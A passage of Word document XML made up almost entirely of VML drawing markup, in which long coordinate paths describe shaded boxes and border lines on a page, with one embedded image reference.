,1298,8828,1298,9030,1298,9235,1298,9444,1298,9656,1298,9872,1298,10092,1298,10316,1298,10543,1298,10543,1298,10543,1298,10543,1298,10543,1298,10543,1298,10543,1298,10543,1298,10543,1298,10543,1298,10543,1298,10543,1298,10543,1298,10543,1298,10543,1298,10543,1298,10543,1298,10543,1298,10543,1299,10543,1299,10543,1299,10543,1299,10543,1299,10543,1300,10543,1300,10543,1300,10543,1301,10543,1301,10543,1301,10543,1302,10543,1302,10543,1303,10543,1303,10543,1304,10543,1304,10543,1305,10543,1306,10543,1306,10543,1307,10543,1308,10543,1309,10543,1310,10543,1310,10543,1311,10543,1312,10543,1313,10543,1315,10543,1316,10543,1317,10543,1318,10543,1319,10543,1321,10543,1322,10543,1324,10543,1325,10543,1327,10543,1328,10543,1330,10543,1332,10543,1334,10543,1336,10543,1338,10543,1340,10543,1342,10543,1344,10543,1346,10543,1348,10543,1351,10543,1353,10543,1356,10543,1358,10543,1361,10543,1364,10543,1367,10543,1370,10543,1373,10543,1376,10543,1379,10543,1382,10543,1385,10543,1389,10543,1392,10543,1396,10543,1400,10543,1403,10543,1407,10543,1411,10543,1415,10543,1419,10543,1424,10543,1428,10543,1432,10543,1437,10543,1442,10543,1446,10543,1451,10543,1456,10543,1461,10543,1466,10543,1472,10543,1477,10543,1482,10543,1488,10543,1494,10543,1500,10543,1505,10543,1512,10543,1518,10543,1524,10543,1530,10543,1537,10543,1544,10543,1550,10543,1557,10543,1564,10543,1571,10543,1579,10543,1586,10543,1594,10543,1601,10543,1609,10543,1609,10543,1609,10543,1609,10543,1609,10543,1609,10543,1609,10542,1609,10542,1609,10541,1609,10540,1609,10538,1609,10536,1609,10534,1609,10532,1609,10529,1609,10525,1609,10521,1609,10517,1609,10512,1609,10506,1609,10500,1609,10493,1609,10486,1609,10478,1609,10469,1609,10459,1609,10449,1609,10437,1609,10425,1609,10412,1609,10398,1609,10383,1609,10366,1609,10349,1609,10331,1609,10312,1609,10291,1609,10270,1609,10247,1609,10223,1609,10198,1609,10171,1609,10143,1609,10114,1609,10083,1609,10051,1609,10018,1609,9983,1609,9946,1609,9908,1609,9868,1609,9827,1609,9784,1609,9739,1609,9693,1609,9645,1609,9595,1609,9543,1609,9489,1609,9434,1609,9377,1609,9317,1609,9256,1609,9193,1609,9127,1609,9060,1609,8990,1609,8919,1609,8845,1609,8769,1609,8691,1609,8610,1609,8527,1609,8442,1609,8354,1609,8265,1609,8172,1609,8077,1609,7980,1609,7880,1609,7778,1609,7673,1609,7565,1609,7455,1609,7342,1609,7226,1609,7108,1609,6986,1609,6862,1609,6735,1609,6605,1609,6473,1609,6337,1609,6198,1609,6057,1609,5912,1609,5764,1609,5613,1609,5459,1609,5302,1609,5142,1609,4978,1609,4811,1609,4641,1609,4467,1609,4290,1609,4110,1609,3926,1609,3739,1609,3548,1609,3354,1609,3156,1609,2954,1609,2749,1609,2540,1609,2328,1609,2112,1609,1892,1609,1668,1609,1440,1609,1440,1609,1440,1609,1440,1609,1440,1609,1440,1609,1440,1609,1440,1609,1440,1609,1440,1609,1440,1609,1440,1609,1440,1609,1440,1609,1440,1609,1440,1608,1440,1608,1440,1608,1440,1608,1440,1608,1440,1608,1440,1607,1440,1607,1440,1607,1440,1607,1440,1606,1440,1606,1440,1606,1440,1605,1440,1605,1440,1604,1440,1604,1440,1603,1440,1603,1440,1602,1440,1602,1440,1601,1440,1600,1440,1600,1440,1599,1440,1598,1440,1597,1440,1596,1440,1595,1440,1594,1440,1593,1440,1592,1440,1591,1440,1590,1440,1589,1440,1587,1440,1586,1440,1584,1440,1583,1440,1581,1440,1580,1440,1578,1440,1577,1440,1575,1440,1573,1440,1571,1440,1569,1440,1567,1440,1565,1440,1563,1440,1561,1440,1558,1440,1556,1440,1553,1440,1551,1440,1548,1440,1546,1440,1543,1440,1540,1440,1537,1440,1534,1440,1531,1440,1528,1440,1525,1440,1521,1440,1518,1440,1514,1440,1511,1440,1507,1440,1503,1440,1499,1440,1496,1440,1491,1440,1487,1440,1483,1440,1479,1440,1474,1440,1470,1440,1465,1440,1460,1440,1456,1440,1451,1440,1446,1440,1440,1440,1435,1440,1430,1440,1424,1440,1419,1440,1413,1440,1407,1440,1401,1440,1395,1440,1389,1440,1383,1440,1376,1440,1370,1440,1363,1440,1356,1440,1349,1440,1342,1440,1335,1440,1328,1440,1321,1440,1313,1440,1306,1440,1298e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:64.500pt;width:1.500pt;height:15.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,1290" coordsize="30,310">
        <v:shape style="position:absolute;left:1430;top:1290;width:30;height:310" coordorigin="1430,1290" coordsize="30,310" path="m1447,1298l1447,1298,1447,1298,1447,1298,1447,1298,1447,1298,1447,1298,1447,1298,1447,1298,1447,1298,1447,1298,1447,1298,1447,1298,1447,1298,1447,1298,1447,1298,1447,1298,1447,1298,1447,1299,1447,1299,1447,1299,1447,1299,1447,1299,1447,1300,1447,1300,1447,1300,1447,1301,1447,1301,1447,1301,1447,1302,1447,1302,1447,1303,1447,1303,1447,1304,1447,1304,1447,1305,1447,1306,1447,1306,1447,1307,1447,1308,1447,1309,1447,1310,1447,1310,1447,1311,1447,1312,1447,1313,1447,1315,1447,1316,1447,1317,1447,1318,1447,1319,1447,1321,1447,1322,1447,1324,1447,1325,1447,1327,1447,1328,1447,1330,1447,1332,1447,1334,1447,1336,1447,1338,1447,1340,1447,1342,1447,1344,1447,1346,1447,1348,1447,1351,1447,1353,1447,1356,1447,1358,1447,1361,1447,1364,1447,1367,1447,1370,1447,1373,1447,1376,1447,1379,1447,1382,1447,1385,1447,1389,1447,1392,1447,1396,1447,1400,1447,1403,1447,1407,1447,1411,1447,1415,1447,1419,1447,1424,1447,1428,1447,1432,1447,1437,1447,1442,1447,1446,1447,1451,1447,1456,1447,1461,1447,1466,1447,1472,1447,1477,1447,1482,1447,1488,1447,1494,1447,1500,1447,1505,1447,1512,1447,1518,1447,1524,1447,1530,1447,1537,1447,1544,1447,1550,1447,1557,1447,1564,1447,1571,1447,1579,1447,1586,1447,1594,1447,1601,1447,1609e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:79.500pt;width:455.500pt;height:16.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,1590" coordsize="9110,330">
        <v:shape style="position:absolute;left:1430;top:1590;width:9110;height:330" coordorigin="1430,1590" coordsize="9110,330" path="m1440,1609l1440,1609,1440,1609,1440,1609,1441,1609,1441,1609,1441,1609,1442,1609,1442,1609,1443,1609,1444,1609,1446,1609,1448,1609,1450,1609,1452,1609,1455,1609,1459,1609,1463,1609,1467,1609,1472,1609,1477,1609,1484,1609,1490,1609,1498,1609,1506,1609,1515,1609,1525,1609,1535,1609,1547,1609,1559,1609,1572,1609,1586,1609,1601,1609,1617,1609,1635,1609,1653,1609,1672,1609,1692,1609,1714,1609,1737,1609,1761,1609,1786,1609,1813,1609,1841,1609,1870,1609,1901,1609,1933,1609,1966,1609,2001,1609,2038,1609,2076,1609,2116,1609,2157,1609,2200,1609,2245,1609,2291,1609,2339,1609,2389,1609,2441,1609,2494,1609,2550,1609,2607,1609,2667,1609,2728,1609,2791,1609,2856,1609,2924,1609,2993,1609,3065,1609,3139,1609,3215,1609,3293,1609,3374,1609,3457,1609,3542,1609,3629,1609,3719,1609,3812,1609,3907,1609,4004,1609,4104,1609,4206,1609,4311,1609,4419,1609,4529,1609,4642,1609,4758,1609,4876,1609,4998,1609,5122,1609,5249,1609,5378,1609,5511,1609,5647,1609,5785,1609,5927,1609,6072,1609,6220,1609,6371,1609,6525,1609,6682,1609,6842,1609,7006,1609,7173,1609,7343,1609,7517,1609,7694,1609,7874,1609,8058,1609,8245,1609,8436,1609,8630,1609,8828,1609,9030,1609,9235,1609,9444,1609,9656,1609,9872,1609,10092,1609,10316,1609,10543,1609,10543,1609,10543,1609,10543,1609,10543,1609,10543,1609,10543,1609,10543,1609,10543,1609,10543,1609,10543,1609,10543,1609,10543,1609,10543,1609,10543,1609,10543,1609,10543,1610,10543,1610,10543,1610,10543,1610,10543,1610,10543,1610,10543,1611,10543,1611,10543,1611,10543,1612,10543,1612,10543,1612,10543,1613,10543,1613,10543,1614,10543,1614,10543,1615,10543,1615,10543,1616,10543,1617,10543,1617,10543,1618,10543,1619,10543,1620,10543,1620,10543,1621,10543,1622,10543,1623,10543,1624,10543,1625,10543,1626,10543,1628,10543,1629,10543,1630,10543,1632,10543,1633,10543,1634,10543,1636,10543,1638,10543,1639,10543,1641,10543,1643,10543,1645,10543,1646,10543,1648,10543,1651,10543,1653,10543,1655,10543,1657,10543,1659,10543,1662,10543,1664,10543,1667,10543,1669,10543,1672,10543,1675,10543,1678,10543,1681,10543,1684,10543,1687,10543,1690,10543,1693,10543,1697,10543,1700,10543,1704,10543,1707,10543,1711,10543,1715,10543,1719,10543,1723,10543,1727,10543,1731,10543,1736,10543,1740,10543,1745,10543,1749,10543,1754,10543,1759,10543,1764,10543,1769,10543,1774,10543,1779,10543,1785,10543,1790,10543,1796,10543,1801,10543,1807,10543,1813,10543,1819,10543,1825,10543,1832,10543,1838,10543,1845,10543,1851,10543,1858,10543,1865,10543,1872,10543,1879,10543,1887,10543,1894,10543,1902,10543,1909,10543,1917,10543,1925,10543,1933,10543,1933,10543,1933,10543,1933,10543,1933,10543,1933,10543,1933,10542,1933,10542,1933,10541,1933,10540,1933,10538,1933,10536,1933,10534,1933,10532,1933,10529,1933,10525,1933,10521,1933,10517,1933,10512,1933,10506,1933,10500,1933,10493,1933,10486,1933,10478,1933,10469,1933,10459,1933,10449,1933,10437,1933,10425,1933,10412,1933,10398,1933,10383,1933,10366,1933,10349,1933,10331,1933,10312,1933,10291,1933,10270,1933,10247,1933,10223,1933,10198,1933,10171,1933,10143,1933,10114,1933,10083,1933,10051,1933,10018,1933,9983,1933,9946,1933,9908,1933,9868,1933,9827,1933,9784,1933,9739,1933,9693,1933,9645,1933,9595,1933,9543,1933,9489,1933,9434,1933,9377,1933,9317,1933,9256,1933,9193,1933,9127,1933,9060,1933,8990,1933,8919,1933,8845,1933,8769,1933,8691,1933,8610,1933,8527,1933,8442,1933,8354,1933,8265,1933,8172,1933,8077,1933,7980,1933,7880,1933,7778,1933,7673,1933,7565,1933,7455,1933,7342,1933,7226,1933,7108,1933,6986,1933,6862,1933,6735,1933,6605,1933,6473,1933,6337,1933,6198,1933,6057,1933,5912,1933,5764,1933,5613,1933,5459,1933,5302,1933,5142,1933,4978,1933,4811,1933,4641,1933,4467,1933,4290,1933,4110,1933,3926,1933,3739,1933,3548,1933,3354,1933,3156,1933,2954,1933,2749,1933,2540,1933,2328,1933,2112,1933,1892,1933,1668,1933,1440,1933,1440,1933,1440,1933,1440,1933,1440,1933,1440,1933,1440,1933,1440,1933,1440,1933,1440,1933,1440,1933,1440,1933,1440,1933,1440,1933,1440,1933,1440,1933,1440,1932,1440,1932,1440,1932,1440,1932,1440,1932,1440,1932,1440,1931,1440,1931,1440,1931,1440,1930,1440,1930,1440,1930,1440,1929,1440,1929,1440,1928,1440,1928,1440,1927,1440,1927,1440,1926,1440,1926,1440,1925,1440,1924,1440,1923,1440,1923,1440,1922,1440,1921,1440,1920,1440,1919,1440,1918,1440,1917,1440,1916,1440,1914,1440,1913,1440,1912,1440,1911,1440,1909,1440,1908,1440,1906,1440,1905,1440,1903,1440,1901,1440,1899,1440,1898,1440,1896,1440,1894,1440,1892,1440,1889,1440,1887,1440,1885,1440,1883,1440,1880,1440,1878,1440,1875,1440,1873,1440,1870,1440,1867,1440,1864,1440,1861,1440,1858,1440,1855,1440,1852,1440,1849,1440,1845,1440,1842,1440,1838,1440,1835,1440,1831,1440,1827,1440,1823,1440,1819,1440,1815,1440,1811,1440,1806,1440,1802,1440,1798,1440,1793,1440,1788,1440,1783,1440,1778,1440,1773,1440,1768,1440,1763,1440,1758,1440,1752,1440,1746,1440,1741,1440,1735,1440,1729,1440,1723,1440,1717,1440,1710,1440,1704,1440,1697,1440,1691,1440,1684,1440,1677,1440,1670,1440,1663,1440,1656,1440,1648,1440,1641,1440,1633,1440,1625,1440,1617,1440,1609e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:79.500pt;width:1.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,1590" coordsize="30,350">
        <v:shape style="position:absolute;left:1430;top:1590;width:30;height:350" coordorigin="1430,1590" coordsize="30,350" path="m1447,1609l1447,1609,1447,1609,1447,1609,1447,1609,1447,1609,1447,1609,1447,1609,1447,1609,1447,1609,1447,1609,1447,1609,1447,1609,1447,1609,1447,1609,1447,1609,1447,1610,1447,1610,1447,1610,1447,1610,1447,1610,1447,1610,1447,1611,1447,1611,1447,1611,1447,1612,1447,1612,1447,1612,1447,1613,1447,1613,1447,1614,1447,1614,1447,1615,1447,1615,1447,1616,1447,1617,1447,1617,1447,1618,1447,1619,1447,1620,1447,1620,1447,1621,1447,1622,1447,1623,1447,1624,1447,1625,1447,1626,1447,1628,1447,1629,1447,1630,1447,1632,1447,1633,1447,1634,1447,1636,1447,1638,1447,1639,1447,1641,1447,1643,1447,1645,1447,1646,1447,1648,1447,1651,1447,1653,1447,1655,1447,1657,1447,1659,1447,1662,1447,1664,1447,1667,1447,1669,1447,1672,1447,1675,1447,1678,1447,1681,1447,1684,1447,1687,1447,1690,1447,1693,1447,1697,1447,1700,1447,1704,1447,1707,1447,1711,1447,1715,1447,1719,1447,1723,1447,1727,1447,1731,1447,1736,1447,1740,1447,1745,1447,1749,1447,1754,1447,1759,1447,1764,1447,1769,1447,1774,1447,1779,1447,1785,1447,1790,1447,1796,1447,1801,1447,1807,1447,1813,1447,1819,1447,1825,1447,1832,1447,1838,1447,1845,1447,1851,1447,1858,1447,1865,1447,1872,1447,1879,1447,1887,1447,1894,1447,1902,1447,1909,1447,1917,1447,1925,1447,1933e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:95.500pt;width:455.500pt;height:15.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,1910" coordsize="9110,310">
        <v:shape style="position:absolute;left:1430;top:1910;width:9110;height:310" coordorigin="1430,1910" coordsize="9110,310" path="m1440,1933l1440,1933,1440,1933,1440,1933,1441,1933,1441,1933,1441,1933,1442,1933,1442,1933,1443,1933,1444,1933,1446,1933,1448,1933,1450,1933,1452,1933,1455,1933,1459,1933,1463,1933,1467,1933,1472,1933,1477,1933,1484,1933,1490,1933,1498,1933,1506,1933,1515,1933,1525,1933,1535,1933,1547,1933,1559,1933,1572,1933,1586,1933,1601,1933,1617,1933,1635,1933,1653,1933,1672,1933,1692,1933,1714,1933,1737,1933,1761,1933,1786,1933,1813,1933,1841,1933,1870,1933,1901,1933,1933,1933,1966,1933,2001,1933,2038,1933,2076,1933,2116,1933,2157,1933,2200,1933,2245,1933,2291,1933,2339,1933,2389,1933,2441,1933,2494,1933,2550,1933,2607,1933,2667,1933,2728,1933,2791,1933,2856,1933,2924,1933,2993,1933,3065,1933,3139,1933,3215,1933,3293,1933,3374,1933,3457,1933,3542,1933,3629,1933,3719,1933,3812,1933,3907,1933,4004,1933,4104,1933,4206,1933,4311,1933,4419,1933,4529,1933,4642,1933,4758,1933,4876,1933,4998,1933,5122,1933,5249,1933,5378,1933,5511,1933,5647,1933,5785,1933,5927,1933,6072,1933,6220,1933,6371,1933,6525,1933,6682,1933,6842,1933,7006,1933,7173,1933,7343,1933,7517,1933,7694,1933,7874,1933,8058,1933,8245,1933,8436,1933,8630,1933,8828,1933,9030,1933,9235,1933,9444,1933,9656,1933,9872,1933,10092,1933,10316,1933,10543,1933,10543,1933,10543,1933,10543,1933,10543,1933,10543,1933,10543,1933,10543,1933,10543,1933,10543,1933,10543,1933,10543,1933,10543,1933,10543,1933,10543,1934,10543,1934,10543,1934,10543,1934,10543,1934,10543,1934,10543,1934,10543,1935,10543,1935,10543,1935,10543,1935,10543,1936,10543,1936,10543,1936,10543,1937,10543,1937,10543,1937,10543,1938,10543,1938,10543,1939,10543,1940,10543,1940,10543,1941,10543,1941,10543,1942,10543,1943,10543,1944,10543,1944,10543,1945,10543,1946,10543,1947,10543,1948,10543,1949,10543,1950,10543,1952,10543,1953,10543,1954,10543,1955,10543,1957,10543,1958,10543,1959,10543,1961,10543,1963,10543,1964,10543,1966,10543,1968,10543,1969,10543,1971,10543,1973,10543,1975,10543,1977,10543,1980,10543,1982,10543,1984,10543,1986,10543,1989,10543,1991,10543,1994,10543,1996,10543,1999,10543,2002,10543,2005,10543,2008,10543,2011,10543,2014,10543,2017,10543,2020,10543,2024,10543,2027,10543,2031,10543,2034,10543,2038,10543,2042,10543,2046,10543,2050,10543,2054,10543,2058,10543,2062,10543,2067,10543,2071,10543,2076,10543,2080,10543,2085,10543,2090,10543,2095,10543,2100,10543,2105,10543,2110,10543,2115,10543,2121,10543,2127,10543,2132,10543,2138,10543,2144,10543,2150,10543,2156,10543,2162,10543,2169,10543,2175,10543,2182,10543,2189,10543,2195,10543,2202,10543,2209,10543,2217,10543,2224,10543,2231,10543,2231,10543,2231,10543,2231,10543,2231,10543,2231,10543,2231,10542,2231,10542,2231,10541,2231,10540,2231,10538,2231,10536,2231,10534,2231,10532,2231,10529,2231,10525,2231,10521,2231,10517,2231,10512,2231,10506,2231,10500,2231,10493,2231,10486,2231,10478,2231,10469,2231,10459,2231,10449,2231,10437,2231,10425,2231,10412,2231,10398,2231,10383,2231,10366,2231,10349,2231,10331,2231,10312,2231,10291,2231,10270,2231,10247,2231,10223,2231,10198,2231,10171,2231,10143,2231,10114,2231,10083,2231,10051,2231,10018,2231,9983,2231,9946,2231,9908,2231,9868,2231,9827,2231,9784,2231,9739,2231,9693,2231,9645,2231,9595,2231,9543,2231,9489,2231,9434,2231,9377,2231,9317,2231,9256,2231,9193,2231,9127,2231,9060,2231,8990,2231,8919,2231,8845,2231,8769,2231,8691,2231,8610,2231,8527,2231,8442,2231,8354,2231,8265,2231,8172,2231,8077,2231,7980,2231,7880,2231,7778,2231,7673,2231,7565,2231,7455,2231,7342,2231,7226,2231,7108,2231,6986,2231,6862,2231,6735,2231,6605,2231,6473,2231,6337,2231,6198,2231,6057,2231,5912,2231,5764,2231,5613,2231,5459,2231,5302,2231,5142,2231,4978,2231,4811,2231,4641,2231,4467,2231,4290,2231,4110,2231,3926,2231,3739,2231,3548,2231,3354,2231,3156,2231,2954,2231,2749,2231,2540,2231,2328,2231,2112,2231,1892,2231,1668,2231,1440,2231,1440,2231,1440,2231,1440,2231,1440,2231,1440,2231,1440,2231,1440,2231,1440,2231,1440,2231,1440,2231,1440,2231,1440,2231,1440,2231,1440,2231,1440,2231,1440,2231,1440,2231,1440,2231,1440,2230,1440,2230,1440,2230,1440,2230,1440,2230,1440,2229,1440,2229,1440,2229,1440,2228,1440,2228,1440,2228,1440,2227,1440,2227,1440,2226,1440,2226,1440,2225,1440,2224,1440,2224,1440,2223,1440,2222,1440,2222,1440,2221,1440,2220,1440,2219,1440,2218,1440,2217,1440,2216,1440,2215,1440,2214,1440,2213,1440,2212,1440,2211,1440,2209,1440,2208,1440,2207,1440,2205,1440,2204,1440,2202,1440,2200,1440,2199,1440,2197,1440,2195,1440,2193,1440,2191,1440,2189,1440,2187,1440,2185,1440,2183,1440,2181,1440,2178,1440,2176,1440,2173,1440,2171,1440,2168,1440,2165,1440,2163,1440,2160,1440,2157,1440,2154,1440,2151,1440,2147,1440,2144,1440,2141,1440,2137,1440,2134,1440,2130,1440,2126,1440,2123,1440,2119,1440,2115,1440,2111,1440,2107,1440,2102,1440,2098,1440,2094,1440,2089,1440,2084,1440,2080,1440,2075,1440,2070,1440,2065,1440,2060,1440,2054,1440,2049,1440,2044,1440,2038,1440,2032,1440,2027,1440,2021,1440,2015,1440,2008,1440,2002,1440,1996,1440,1989,1440,1983,1440,1976,1440,1969,1440,1962,1440,1955,1440,1948,1440,1941,1440,1933e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:110.500pt;width:455.500pt;height:0.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,2210" coordsize="9110,10">
        <v:shape style="position:absolute;left:1430;top:2210;width:9110;height:10" coordorigin="1430,2210" coordsize="9110,10" path="m1440,2225l1440,2225,1440,2225,1440,2225,1441,2225,1441,2225,1441,2225,1442,2225,1442,2225,1443,2225,1444,2225,1446,2225,1448,2225,1450,2225,1452,2225,1455,2225,1459,2225,1463,2225,1467,2225,1472,2225,1477,2225,1484,2225,1490,2225,1498,2225,1506,2225,1515,2225,1525,2225,1535,2225,1547,2225,1559,2225,1572,2225,1586,2225,1601,2225,1617,2225,1635,2225,1653,2225,1672,2225,1692,2225,1714,2225,1737,2225,1761,2225,1786,2225,1813,2225,1841,2225,1870,2225,1901,2225,1933,2225,1966,2225,2001,2225,2038,2225,2076,2225,2116,2225,2157,2225,2200,2225,2245,2225,2291,2225,2339,2225,2389,2225,2441,2225,2494,2225,2550,2225,2607,2225,2667,2225,2728,2225,2791,2225,2856,2225,2924,2225,2993,2225,3065,2225,3139,2225,3215,2225,3293,2225,3374,2225,3457,2225,3542,2225,3629,2225,3719,2225,3812,2225,3907,2225,4004,2225,4104,2225,4206,2225,4311,2225,4419,2225,4529,2225,4642,2225,4758,2225,4876,2225,4998,2225,5122,2225,5249,2225,5378,2225,5511,2225,5647,2225,5785,2225,5927,2225,6072,2225,6220,2225,6371,2225,6525,2225,6682,2225,6842,2225,7006,2225,7173,2225,7343,2225,7517,2225,7694,2225,7874,2225,8058,2225,8245,2225,8436,2225,8630,2225,8828,2225,9030,2225,9235,2225,9444,2225,9656,2225,9872,2225,10092,2225,10316,2225,10543,2225e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:71.400pt;margin-top:95.400pt;width:453.0pt;height:15.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId17" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:98.500pt;margin-top:81.500pt;width:6.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1970,1630" coordsize="130,230">
        <v:shape style="position:absolute;left:1970;top:1630;width:130;height:230" coordorigin="1970,1630" coordsize="130,230" path="m1998,1648l1998,1648,1998,1648,1998,1648,1998,1648,1998,1648,1998,1648,1998,1648,1998,1648,1998,1648,1998,1648,1998,1648,1998,1648,1998,1648,1998,1648,1998,1648,1998,1648,1998,1648,1998,1648,1998,1648,1998,1648,1998,1648,1999,1648,1999,1648,1999,1648,1999,1648,1999,1648,1999,1648,1999,1648,1999,1648,1999,1648,2000,1648,2000,1648,2000,1648,2000,1648,2000,1648,2001,1648,2001,1648,2001,1648,2001,1648,2002,1648,2002,1648,2002,1648,2003,1648,2003,1648,2003,1648,2004,1648,2004,1648,2004,1648,2005,1648,2005,1648,2006,1648,2006,1648,2007,1648,2007,1648,2008,1648,2008,1648,2009,1648,2009,1648,2010,1648,2011,1648,2011,1648,2012,1648,2013,1648,2013,1648,2014,1648,2015,1648,2016,1648,2017,1648,2017,1648,2018,1648,2019,1648,2020,1648,2021,1648,2022,1648,2023,1648,2024,1648,2025,1648,2026,1648,2027,1648,2028,1648,2030,1648,2031,1648,2032,1648,2033,1648,2034,1648,2036,1648,2037,1648,2039,1648,2040,1648,2041,1648,2043,1648,2044,1648,2046,1648,2048,1648,2049,1648,2051,1648,2052,1648,2054,1648,2056,1648,2058,1648,2060,1648,2061,1648,2063,1648,2065,1648,2067,1648,2069,1648,2071,1648,2073,1648,2076,1648,2078,1648,2080,1648,2082,1648,2084,1648,2087,1648,2089,1648,2092,1648,2094,1648,2097,1648,2099,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1649,2102,1649,2102,1649,2102,1649,2102,1649,2102,1649,2102,1649,2102,1650,2102,1650,2102,1650,2102,1650,2102,1651,2102,1651,2102,1651,2102,1652,2102,1652,2102,1653,2102,1653,2102,1653,2102,1654,2102,1654,2102,1655,2102,1656,2102,1656,2102,1657,2102,1658,2102,1658,2102,1659,2102,1660,2102,1661,2102,1661,2102,1662,2102,1663,2102,1664,2102,1665,2102,1666,2102,1667,2102,1668,2102,1670,2102,1671,2102,1672,2102,1673,2102,1675,2102,1676,2102,1678,2102,1679,2102,1681,2102,1682,2102,1684,2102,1685,2102,1687,2102,1689,2102,1691,2102,1693,2102,1695,2102,1697,2102,1699,2102,1701,2102,1703,2102,1705,2102,1708,2102,1710,2102,1712,2102,1715,2102,1717,2102,1720,2102,1723,2102,1725,2102,1728,2102,1731,2102,1734,2102,1737,2102,1740,2102,1743,2102,1746,2102,1750,2102,1753,2102,1757,2102,1760,2102,1764,2102,1767,2102,1771,2102,1775,2102,1779,2102,1783,2102,1787,2102,1791,2102,1795,2102,1799,2102,1804,2102,1808,2102,1813,2102,1817,2102,1822,2102,1827,2102,1832,2102,1837,2102,1842,2102,1847,2102,1852,2102,1857,2102,1863,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2101,1868,2101,1868,2101,1868,2101,1868,2101,1868,2101,1868,2101,1868,2101,1868,2101,1868,2101,1868,2101,1868,2101,1868,2100,1868,2100,1868,2100,1868,2100,1868,2100,1868,2100,1868,2099,1868,2099,1868,2099,1868,2099,1868,2098,1868,2098,1868,2098,1868,2097,1868,2097,1868,2097,1868,2096,1868,2096,1868,2096,1868,2095,1868,2095,1868,2094,1868,2094,1868,2094,1868,2093,1868,2093,1868,2092,1868,2091,1868,2091,1868,2090,1868,2090,1868,2089,1868,2088,1868,2088,1868,2087,1868,2086,1868,2086,1868,2085,1868,2084,1868,2083,1868,2082,1868,2082,1868,2081,1868,2080,1868,2079,1868,2078,1868,2077,1868,2076,1868,2075,1868,2074,1868,2073,1868,2071,1868,2070,1868,2069,1868,2068,1868,2067,1868,2065,1868,2064,1868,2063,1868,2061,1868,2060,1868,2058,1868,2057,1868,2055,1868,2054,1868,2052,1868,2051,1868,2049,1868,2047,1868,2046,1868,2044,1868,2042,1868,2040,1868,2038,1868,2036,1868,2034,1868,2032,1868,2030,1868,2028,1868,2026,1868,2024,1868,2022,1868,2020,1868,2018,1868,2015,1868,2013,1868,2011,1868,2008,1868,2006,1868,2003,1868,2001,1868,1998,1868,1998,1868,1998,1868,1998,1868,1998,1868,1998,1868,1998,1868,1998,1868,1998,1868,1998,1868,1998,1868,1998,1868,1998,1868,1998,1868,1998,1868,1998,1868,1998,1868,1998,1868,1998,1868,1998,1868,1998,1867,1998,1867,1998,1867,1998,1867,1998,1867,1998,1866,1998,1866,1998,1866,1998,1866,1998,1865,1998,1865,1998,1865,1998,1864,1998,1864,1998,1864,1998,1863,1998,1863,1998,1862,1998,1862,1998,1861,1998,1861,1998,1860,1998,1859,1998,1859,1998,1858,1998,1857,1998,1856,1998,1856,1998,1855,1998,1854,1998,1853,1998,1852,1998,1851,1998,1850,1998,1849,1998,1848,1998,1847,1998,1845,1998,1844,1998,1843,1998,1841,1998,1840,1998,1839,1998,1837,1998,1836,1998,1834,1998,1832,1998,1831,1998,1829,1998,1827,1998,1825,1998,1823,1998,1821,1998,1819,1998,1817,1998,1815,1998,1813,1998,1811,1998,1809,1998,1806,1998,1804,1998,1801,1998,1799,1998,1796,1998,1794,1998,1791,1998,1788,1998,1785,1998,1782,1998,1779,1998,1776,1998,1773,1998,1770,1998,1766,1998,1763,1998,1760,1998,1756,1998,1753,1998,1749,1998,1745,1998,1741,1998,1737,1998,1734,1998,1729,1998,1725,1998,1721,1998,1717,1998,1713,1998,1708,1998,1704,1998,1699,1998,1694,1998,1689,1998,1685,1998,1680,1998,1674,1998,1669,1998,1664,1998,1659,1998,1653,1998,1648e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:104.500pt;margin-top:81.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2090,1630" coordsize="110,230">
